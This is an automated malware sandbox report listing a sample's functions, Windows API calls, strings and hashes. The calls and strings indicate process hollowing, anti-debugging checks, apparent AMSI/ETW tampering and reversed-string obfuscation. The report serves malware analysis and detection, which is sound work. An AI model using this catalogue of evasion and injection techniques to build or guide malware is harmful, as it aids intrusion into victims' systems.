Part of subcall function 02908140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029081C8,?,?,00000000,00000000,?,029080E1,00000000,KernelBASE,00000000,00000000,02908108), ref: 0290818D
Part of subcall function 02908140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02908193
Part of subcall function 02908140: GetProcAddress.KERNEL32(?,?), ref: 029081A5

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 029086E0

Strings

CreateProcessAsUserW, xrefs: 0290866D
Kernel32, xrefs: 0290869F

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$CreateProcessUser
String ID: CreateProcessAsUserW$Kernel32
API String ID: 3130163322-2353454454
Opcode ID: 9166737885d7e470c63af0ccc5f996eef128c5f61945ff31c080238e3ebaddac
Instruction ID: 4fe61fca0e03046c86730995a5a3edc3e6dbde2200fff8df9ce08317489b32eb
Opcode Fuzzy Hash: 9166737885d7e470c63af0ccc5f996eef128c5f61945ff31c080238e3ebaddac
Instruction Fuzzy Hash: 4911C2BA644208AFDB80EEADDC91FAB37EDEB4C704F514451BA08D7680D634E9108B65

Function 02907A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02908098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02908108,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 029080D6
Part of subcall function 02908098: GetModuleHandleA.KERNELBASE(?), ref: 029080EA

Part of subcall function 02908140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029081C8,?,?,00000000,00000000,?,029080E1,00000000,KernelBASE,00000000,00000000,02908108), ref: 0290818D
Part of subcall function 02908140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02908193
Part of subcall function 02908140: GetProcAddress.KERNEL32(?,?), ref: 029081A5

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02907A9F

Strings

ntdll, xrefs: 02907A74
yromeMlautriVetacollAwZ, xrefs: 02907A47

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: c1c024e8f9fea2674045f312fa0af811dd1e860a76c254eb3662103d84945091
Instruction ID: dfdef2751e01f3a2858dc44d312ba4bf72460bd6f973c93c9fcb03bbf1302899
Opcode Fuzzy Hash: c1c024e8f9fea2674045f312fa0af811dd1e860a76c254eb3662103d84945091
Instruction Fuzzy Hash: A1115E7960020CBFEB10EFA9DC91EAEB7EDEB4C714F404461BA00D7680DA30EA008B61

Function 02907A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02908098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02908108,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 029080D6
Part of subcall function 02908098: GetModuleHandleA.KERNELBASE(?), ref: 029080EA

Part of subcall function 02908140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029081C8,?,?,00000000,00000000,?,029080E1,00000000,KernelBASE,00000000,00000000,02908108), ref: 0290818D
Part of subcall function 02908140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02908193
Part of subcall function 02908140: GetProcAddress.KERNEL32(?,?), ref: 029081A5

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02907A9F

Strings

ntdll, xrefs: 02907A74
yromeMlautriVetacollAwZ, xrefs: 02907A47

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: d7e20c7be802fb864f2577abd3172312b28f1c22fad388c6195637623444870a
Instruction ID: ceacd40c55b4c23ed7f9cc3bacb52e9903450fd2bbec074847f173cd9bb8c1d9
Opcode Fuzzy Hash: d7e20c7be802fb864f2577abd3172312b28f1c22fad388c6195637623444870a
Instruction Fuzzy Hash: A5115E7960020CBFEB10EFA9DC91EAEB7EDEB4C714F404461BA00D7680DA30EA008B61

Function 029082CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02908098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02908108,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 029080D6
Part of subcall function 02908098: GetModuleHandleA.KERNELBASE(?), ref: 029080EA

Part of subcall function 02908140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029081C8,?,?,00000000,00000000,?,029080E1,00000000,KernelBASE,00000000,00000000,02908108), ref: 0290818D
Part of subcall function 02908140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02908193
Part of subcall function 02908140: GetProcAddress.KERNEL32(?,?), ref: 029081A5

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0290833D

Strings

yromeMlautriVdaeRtN, xrefs: 029082E7
ntdll, xrefs: 02908314

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryReadVirtual
String ID: ntdll$yromeMlautriVdaeRtN
API String ID: 2521977463-737317276
Opcode ID: 1fc3c48fd1b4297c1584b013723eb4132009e17a081b16e7898394e2df83f48b
Instruction ID: ee9bd4a242cceb4646d1f21b2a595274b5b76c0a86509c1e58dfec691ce6894f
Opcode Fuzzy Hash: 1fc3c48fd1b4297c1584b013723eb4132009e17a081b16e7898394e2df83f48b
Instruction Fuzzy Hash: 38014079B44308AFDB54EFA9DC91EAA77EEFB8CB04F508461B604D7680D630E9108B25

Function 02907D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02908098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02908108,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 029080D6
Part of subcall function 02908098: GetModuleHandleA.KERNELBASE(?), ref: 029080EA

Part of subcall function 02908140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029081C8,?,?,00000000,00000000,?,029080E1,00000000,KernelBASE,00000000,00000000,02908108), ref: 0290818D
Part of subcall function 02908140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02908193
Part of subcall function 02908140: GetProcAddress.KERNEL32(?,?), ref: 029081A5

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907DEC

Strings

yromeMlautriVetirW, xrefs: 02907D93
Ntdll, xrefs: 02907DC3

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 2719805696-3542721025
Opcode ID: 61e57eaa25360a5b9f62d53848f663a9601eae46cb3ed9cf8253220e981fed56
Instruction ID: be7d41d91c223854ecd5a40610b6536b1cea34deb00dc2aebab01a3208fdd0be
Opcode Fuzzy Hash: 61e57eaa25360a5b9f62d53848f663a9601eae46cb3ed9cf8253220e981fed56
Instruction Fuzzy Hash: C1016979A00208AFDB40EFA8D891E9BB7EDEB89B14F504850B604D7690C630ED108B61

Function 0290853C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02908098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02908108,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 029080D6
Part of subcall function 02908098: GetModuleHandleA.KERNELBASE(?), ref: 029080EA

Part of subcall function 02908140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029081C8,?,?,00000000,00000000,?,029080E1,00000000,KernelBASE,00000000,00000000,02908108), ref: 0290818D
Part of subcall function 02908140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02908193
Part of subcall function 02908140: GetProcAddress.KERNEL32(?,?), ref: 029081A5

NtUnmapViewOfSection.NTDLL(?,?), ref: 029085A1

Strings

ntdll, xrefs: 02908584
noitceSfOweiVpamnUtN, xrefs: 02908557

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$SectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 3503870465-2520021413
Opcode ID: f1e40dfbf71a97b9a33a3b6a1f35c008425b3079eee38944c25373a2de49f8f5
Instruction ID: 0b302664c495c3de121a2139387dca02a834f6b9687c56525eb05f56b6778e7a
Opcode Fuzzy Hash: f1e40dfbf71a97b9a33a3b6a1f35c008425b3079eee38944c25373a2de49f8f5
Instruction Fuzzy Hash: B101677DB4430CAFE750EBB5DC91E6EB7EEFB89704F518461B600D7680DA30A9048E25

Function 0290DEA4 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON

Download Yara Rule

APIs

Rt.N(?,?,00000000,0290DF72), ref: 0290DF20
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0290DF72), ref: 0290DF36
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0290DF72), ref: 0290DF55

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: Path$DeleteFileNameName_
String ID:
API String ID: 4284456518-0
Opcode ID: cc427f1bdfbeae67edb0cf04b972fcf6faa896d569b29a8ae5982a717f6ac045
Instruction ID: 51820821a444c4be501903e5c5aa2f6e2688ee489110dcad8bec222305f2e66d
Opcode Fuzzy Hash: cc427f1bdfbeae67edb0cf04b972fcf6faa896d569b29a8ae5982a717f6ac045
Instruction Fuzzy Hash: 2A01627994420C6EEB05E7E08DC2BCE77BDEB95700F5144E2D300E60C1DA74AB088B71

Function 0290DEF8 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 028F4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 028F4F2E

Rt.N(?,?,00000000,0290DF72), ref: 0290DF20
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0290DF72), ref: 0290DF36
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0290DF72), ref: 0290DF55

Part of subcall function 028F4C60: SysFreeString.OLEAUT32(0290F798), ref: 028F4C6E

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: PathString$AllocDeleteFileFreeNameName_
String ID:
API String ID: 1530111750-0
Opcode ID: 3d2cdd10f0e7f560f7ce6154d65789c77f26c687a9eff1db69ae573823470d4a
Instruction ID: 17c13990539cb9b383d352776dc0bb79351d2601fe720a14a5dd31ecd8d8681c
Opcode Fuzzy Hash: 3d2cdd10f0e7f560f7ce6154d65789c77f26c687a9eff1db69ae573823470d4a
Instruction Fuzzy Hash: DA01E17595420CAEEB11EBE4DD82FCEB3ADDB48700F5144B2E704E25C0EA74AB048A75

Function 02906DC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

Part of subcall function 02906D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02906DB9,?,?,?,00000000), ref: 02906D99

CoCreateInstance.OLE32(?,00000000,00000005,02906EAC,00000000,00000000,02906E2B,?,00000000,02906E9B), ref: 02906E17

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 1584680628f69887b19681a49192cb992e221d565d491793e4b889180627b76b
Instruction ID: 6f837018947d0347843e1dab1b57296295b6aedea8149b8d92b92697b7eec65a
Opcode Fuzzy Hash: 1584680628f69887b19681a49192cb992e221d565d491793e4b889180627b76b
Instruction Fuzzy Hash: 2D01F235208708AEF711EF65DCA286FBBFDEB89B00B510875F505E26C0E731AA30C861

Function 0290FABC Relevance: 220.8, APIs: 8, Strings: 113, Instructions: 9098COMMON

Download Yara Rule

APIs

InetIsOffline.URL(00000000,00000000,0291B99E,?,?,?,00000305,00000000,00000000), ref: 0290FAF6

Part of subcall function 0290889C: LoadLibraryA.KERNEL32(00000000,00000000,02908983), ref: 029088D0
Part of subcall function 0290889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02908983), ref: 029088E0
Part of subcall function 0290889C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 029088F9
Part of subcall function 0290889C: FreeLibrary.KERNEL32(74AE0000,00000000,0294B388,Function_0000662C,00000004,0294B398,0294B388,000186A3,00000040,0294B39C,74AE0000,00000000,00000000,00000000,00000000,02908983), ref: 02908963

Part of subcall function 0290F9DC: GetModuleHandleW.KERNEL32(KernelBase,?,0290FDE0,UacInitialize,0294B37C,0291B9D4,UacScan,0294B37C,0291B9D4,ScanBuffer,0294B37C,0291B9D4,OpenSession,0294B37C,0291B9D4,ScanString), ref: 0290F9E2
Part of subcall function 0290F9DC: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0290F9F4

Part of subcall function 0290FA38: GetModuleHandleW.KERNEL32(KernelBase), ref: 0290FA48
Part of subcall function 0290FA38: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0290FA5A
Part of subcall function 0290FA38: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0290FA71

Part of subcall function 028F7E5C: GetFileAttributesA.KERNEL32(00000000,?,02910714,ScanString,0294B37C,0291B9D4,OpenSession,0294B37C,0291B9D4,ScanString,0294B37C,0291B9D4,UacScan,0294B37C,0291B9D4,UacInitialize), ref: 028F7E67

Part of subcall function 028FC364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02A3F8C4,?,02910A46,ScanBuffer,0294B37C,0291B9D4,OpenSession,0294B37C,0291B9D4,ScanBuffer,0294B37C,0291B9D4,OpenSession), ref: 028FC37B

Part of subcall function 0290E064: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290E134), ref: 0290E09F
Part of subcall function 0290E064: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0290E134), ref: 0290E0CF
Part of subcall function 0290E064: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0290E0E4
Part of subcall function 0290E064: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0290E110
Part of subcall function 0290E064: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0290E119

Part of subcall function 028F7E80: GetFileAttributesA.KERNEL32(00000000,?,02913891,ScanString,0294B37C,0291B9D4,OpenSession,0294B37C,0291B9D4,ScanBuffer,0294B37C,0291B9D4,OpenSession,0294B37C,0291B9D4,Initialize), ref: 028F7E8B

Part of subcall function 028F8048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02913A2F,OpenSession,0294B37C,0291B9D4,ScanString,0294B37C,0291B9D4,Initialize,0294B37C,0291B9D4,ScanString,0294B37C,0291B9D4), ref: 028F8055

Strings

VirtualAllocEx, xrefs: 0291ACB7
IconIndex=, xrefs: 02916F7D
NtOpenSection, xrefs: 0291B0C2
GET, xrefs: 0291274A
RtlQueryProcessDebugInformation, xrefs: 0291AB4E
ScanString, xrefs: 0290FBF3, 0290FE82, 0290FF97, 02910128, 029102B9, 02910542, 02910683, 02910C09, 02911821, 029119BD, 02911DF9, 02912014, 02912090, 029123AD, 029126D3, 0291299C, 02912DD9, 0291320A, 0291341A, 029134D0, 029137FF, 02913921, 02913BE2, 02915780, 0291591A, 02915C5F, 02916023, 029166C2, 02916EA8, 0291701F, 029170D7, 02917744, 02917BDE, 02918045, 02918668, 0291910F, 02919501, 029198EA, 02919CA6, 02919FA4, 0291A35F, 0291A746, 0291A93D, 0291AEE7
spp, xrefs: 0291A2A4, 0291A2D7, 0291AF74
URL=file:", xrefs: 02916F27
MiniDumpReadDumpStream, xrefs: 02919432
SxTracerGetThreadContextDebug, xrefs: 0291A28D, 0291AF5D
SLGetEncryptedPIDEx, xrefs: 0291AFF6
tquery, xrefs: 0291A271
BCryptVerifySignature, xrefs: 0291019E, 0291A451
CreateProcessW, xrefs: 0291ABB7
dbgcore, xrefs: 02919423, 02919437
SLIsGenuineLocalEx, xrefs: 0291A080
RetailTracerEnable, xrefs: 0291A25A
TrustOpenStores, xrefs: 0290FEF8
can, xrefs: 02914037
GZmMS1j, xrefs: 0290FB04
NtOpenFile, xrefs: 0291B28D
CryptSIPGetSignedDataMsg, xrefs: 029100EF
ieproxy, xrefs: 0290FE09, 0290FE30, 0290FE60
endpointdlp, xrefs: 0291A60F, 0291A642, 0291A675, 0291A6A8
DlpGetWebSiteAccess, xrefs: 0291A691
LdrLoadDll, xrefs: 0291B1F4
UacInitialize, xrefs: 0290FD83, 0291044A, 02910B8D, 02915704, 02915ABA, 02915FA7, 02917ABD, 029192FF, 0291971B
Advapi, xrefs: 0291AB62, 0291AB71, 0291AB80, 0291AB8F, 0291ABCB, 0291ABDA, 0291ABE9
RtlAllocateHeap, xrefs: 0291A7EF, 0291A855
SLLoadApplicationPolicies, xrefs: 0291A0B3
NtSetSecurityObject, xrefs: 02919446
FindCertsByIssuer, xrefs: 0290FF5E
sppwmi, xrefs: 0291AFA7
psapi, xrefs: 0291AB9E
C:\Users\Public\, xrefs: 02915F50, 029171C3
NtWaitForSingleObject, xrefs: 0291A822
WinHttp.WinHttpRequest.5.1, xrefs: 02912631
NtAccessCheck, xrefs: 0291B1C1
DlpCheckIsCloudSyncApp, xrefs: 0291A62B
mssip32, xrefs: 029100A0, 029100D3, 02910106, 0291A33D
WriteVirtualMemory, xrefs: 0291AD50
CreateProcessAsUserA, xrefs: 0291ABC6
OpenSession, xrefs: 0290FB8F, 0290FC57, 02910607, 02910728, 02910835, 0291094D, 02910D21, 02910EBF, 02911065, 02911185, 0291131A, 02911412, 029115FF, 029117A5, 02911AD3, 02911D01, 02911E75, 02911F98, 02912116, 029124BC, 0291253F, 02912657, 0291276F, 0291287B, 02912A99, 02912BB6, 02912E55, 02912ED1, 029130E6, 02913286, 029135C8, 02913783, 0291399D, 02913AB7, 02913E58, 029157FC, 02915996, 02915B36, 02915CDB, 02915E4F, 0291609F, 02916153, 02916410, 02916508, 029169BF, 02916C99, 02916E0D, 02916FA3, 02917153, 0291783C, 02917A41, 02917C5A, 02917CFD, 02917E90, 02918258, 029184F4, 029187F1, 0291894A, 02918AF0, 02918C7D, 02918E11, 02918F90, 02919093, 02919207, 02919485, 02919675, 02919966, 02919AEC, 02919D22, 02919F28, 0291A0EC, 0291A3DB, 0291A48A, 0291A6CA, 0291A8C1, 0291A9B9, 0291AE6B, 0291B433
.url, xrefs: 02915F5B
NtWriteVirtualMemory, xrefs: 0291B25A
OpenProcess, xrefs: 0291AD1D
sppc, xrefs: 0291A031, 0291A064, 0291A097, 0291A0CA, 0291AFDA, 0291B00D
WintrustAddActionID, xrefs: 0290FF2B
BCryptRegisterProvider, xrefs: 02910204
SetUnhandledExceptionFilter, xrefs: 0291ADB6
DllGetActivationFactory, xrefs: 02910362
HotKey=, xrefs: 029170B1
EtwEventWrite, xrefs: 0291B2F3
Kernel32, xrefs: 0291ABAD, 0291ABBC, 0291ABF8
CreateProcessAsUserW, xrefs: 0291ABD5, 0291ABF3
ntdll, xrefs: 029193FB, 0291944B, 0291945F, 0291A7D3, 0291A806, 0291A839, 0291A86C, 0291A89F, 0291B040, 0291B073, 0291B0A6, 0291B0D9, 0291B10C, 0291B13F, 0291B172, 0291B1A5, 0291B1D8, 0291B20B, 0291B23E, 0291B271, 0291B2A4, 0291B2D7, 0291B30A
BCryptQueryProviderRegistration, xrefs: 029101D1
RtlCreateQueryDebugBuffer, xrefs: 0291A888
NtCreateSection, xrefs: 0291B0F5
VirtualProtect, xrefs: 0291ACEA
NtDeviceIoControlFile, xrefs: 0291AB30
LdrGetProcedureAddress, xrefs: 0291B227
NtOpenProcess, xrefs: 0291945A
advapi32, xrefs: 0291940F
ScanBuffer, xrefs: 0290FCBB, 02910013, 0291023D, 029107A4, 029108B1, 029109C9, 02910D9D, 02910F3B, 029110E1, 02911201, 02911396, 0291148E, 029116F7, 0291189D, 02911A39, 02911B4F, 02911BDD, 02911EF1, 02912192, 029122A3, 02912440, 029127EB, 029128F7, 02912B15, 02912C32, 02912F4D, 02912FEE, 02913162, 02913322, 02913644, 02913A3B, 02913CDA, 02913DDC, 02915878, 02915BB2, 02915ECB, 0291624B, 02916584, 02916836, 02916A3B, 02916BA1, 02916D15, 02916D91, 02917934, 029179C5, 02917DF5, 02917F88, 029180E4, 029181DC, 029186F9, 029189C6, 02918B6C, 02918CF9, 02918E8D, 0291900C, 02919283, 0291937B, 02919797, 02919A70, 02919BE4, 02919E1A, 02919EAC, 0291A1E4, 0291A582, 0291AAB1, 0291B3B7
SLGetGenuineInformation, xrefs: 0291A01A
DlpGetArchiveFileTraceInfo, xrefs: 0291A65E
NtQuerySecurityObject, xrefs: 0291B18E
UacScan, xrefs: 0290FD1F, 029103CE, 029104C6, 02910A95, 0291167B, 02911C59, 029125BB, 02912CCE, 02913F50, 02915D57, 029162C7, 0291648C, 029167BA, 029168C7, 02916B25, 02916C1D, 029177C0, 02917B62, 02917D79, 02917F0C, 02918160, 029185EC, 02918775, 029188CE, 02918A74, 02918C01, 02918D95, 02918F14, 0291918B, 029195F9, 02919813, 029199F4, 02919B68, 02919D9E, 0291AC0E
NtReadVirtualMemory, xrefs: 0291B15B
I_QueryTagInformation, xrefs: 0291940A
DllRegisterServer, xrefs: 0290FE49, 02910395
EnumServicesStatusW, xrefs: 0291AB6C
NtMapViewOfSection, xrefs: 0291B128
smartscreenps, xrefs: 02910346, 02910379, 029103AC
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 02910C7F
[InternetShortcut], xrefs: 02916F18
C:\Windows\System32\, xrefs: 029106FF, 02917B3B, 02918883
psapi, xrefs: 0291A30A
NtAlertResumeThread, xrefs: 0291A7BC
CreateProcessA, xrefs: 0291ABA8
http, xrefs: 0291241D
SLGatherMigrationBlob, xrefs: 0291AFC3
SLGetSLIDList, xrefs: 0291A04D
NtGetWriteWatch, xrefs: 0291B029
NtOpenObjectAuditAlarm, xrefs: 029193F6
EnumProcessModules, xrefs: 0291AB99
EnumServicesStatusA, xrefs: 0291AB5D
NtQueryVirtualMemory, xrefs: 0291B05C
VirtualAlloc, xrefs: 0291AC84
C:\\Users\\Public\\Libraries\\, xrefs: 02916337
NtQuerySystemInformation, xrefs: 0291AB21
NtQueryDirectoryFile, xrefs: 0291AB3F
NtQueryInformationThread, xrefs: 0291B08F
CryptSIPVerifyIndirectData, xrefs: 029100BC, 0291A326
bcrypt, xrefs: 029101B5, 029101E8, 0291021B, 0291A468
Initialize, xrefs: 0290FB2B, 02910B11, 02910CA5, 02910E43, 02910FE9, 0291129E, 02911941, 02911D7D, 02912227, 02912331, 02912A18, 02912D4A, 0291306A, 0291339E, 0291354C, 029138A5, 02913C5E, 02915A3E, 02915DD3, 029161CF, 02916394, 02916600, 0291673E, 02916943, 029178B8, 02918570, 0291957D, 0291A168, 0291A506, 0291AA35, 0291ADEF, 0291B33B
